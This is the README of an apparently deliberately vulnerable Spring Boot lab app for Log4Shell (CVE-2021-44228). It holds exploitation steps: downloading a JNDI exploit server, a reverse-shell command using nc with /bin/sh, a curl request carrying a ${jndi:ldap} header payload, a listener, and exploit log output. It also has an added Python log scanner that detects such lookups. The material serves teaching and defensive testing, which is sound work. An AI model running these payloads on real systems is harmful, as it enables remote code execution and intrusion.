/log4shell-vulnerable-app

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Primary language: Java. License: Apache-2.0.

Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.

Running the application

Run it:

Build it yourself (you don't need any Java-related tooling):

docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Exploitation steps

Note: This is heavily inspired by the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandboxed environment.

Update (Dec 13th): The JNDIExploit repository has been removed from GitHub (presumably, not by GitHub). Just prefix the JNDIExploit download URL below with web.archive.org to use the version cached by the Wayback Machine.

  • Download JNDIExploit and start it:
wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C nc <privateIP> 8083 -e /bin/sh -A <privateIP>
  • Then, trigger the exploit using:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/<randomString>}'
  • Then, listen on the attacking machine on the port on which we want to receive the connection:
nc -lvp 8083
  • Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
2021-12-15 10:42:16 [LDAPSERVER] >> Send LDAP reference result for lcogih redirecting to http://54.243.12.192:8180/ExecTemplateJDK8.class
2021-12-15 10:42:16 [JETTYSERVER]>> Log a request to http://54.243.12.192:8180/ExecTemplateJDK8.class
  • To confirm that the code execution was successful, notice the shell opened to the attacking machine:
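A defender-side check, added here and not part of the repository: scan logged request fields (the X-Api-Version header used above, or any other value the application logs) for the ${jndi:...} lookup string and pull out the callback host and port for alerting. The log line format and the IP addresses in the sample are constructed for this example.

```python
import re
from urllib.parse import unquote

# Matches a Log4j JNDI lookup such as ${jndi:ldap://10.0.0.5:1389/abc} and
# captures the scheme, host, optional port and path of the callback URL.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>[^}\s]*)\}",
    re.IGNORECASE,
)


def find_jndi_lookups(text):
    """Return every JNDI lookup found in one logged string.

    The string is percent-decoded first, because access logs often record
    request headers URL-encoded; matching is case-insensitive."""
    decoded = unquote(text)
    return [
        {
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path") or "/",
            "raw": m.group(0),
        }
        for m in JNDI_RE.finditer(decoded)
    ]


def scan_log(lines):
    """Scan an iterable of log lines; return (line_number, finding) pairs."""
    hits = []
    for number, line in enumerate(lines, 1):
        for finding in find_jndi_lookups(line):
            hits.append((number, finding))
    return hits


# Constructed sample log (hypothetical format: '<ts> <method> <path> <Header>="<value>"'):
# one benign request, one carrying the lookup string from the curl command above,
# and one where the same kind of value was logged percent-encoded.
SAMPLE_LOG = [
    '2021-12-15 10:42:10 GET / X-Api-Version="1.2.3"',
    '2021-12-15 10:42:16 GET / X-Api-Version="${jndi:ldap://10.0.0.5:1389/lcogih}"',
    '2021-12-15 10:42:20 GET / User-Agent="%24%7Bjndi%3Aldap%3A%2F%2F10.0.0.9%2Fx%7D"',
]

if __name__ == "__main__":
    for number, f in scan_log(SAMPLE_LOG):
        print(f"line {number}: {f['scheme']} callback to {f['host']}:{f['port']} path {f['path']}")
```

Alert on any hit and treat the extracted host as an indicator to block at the egress firewall; the application never needs to reach an LDAP server on the internet.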

Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contributors

@christophetd @rayhan0x01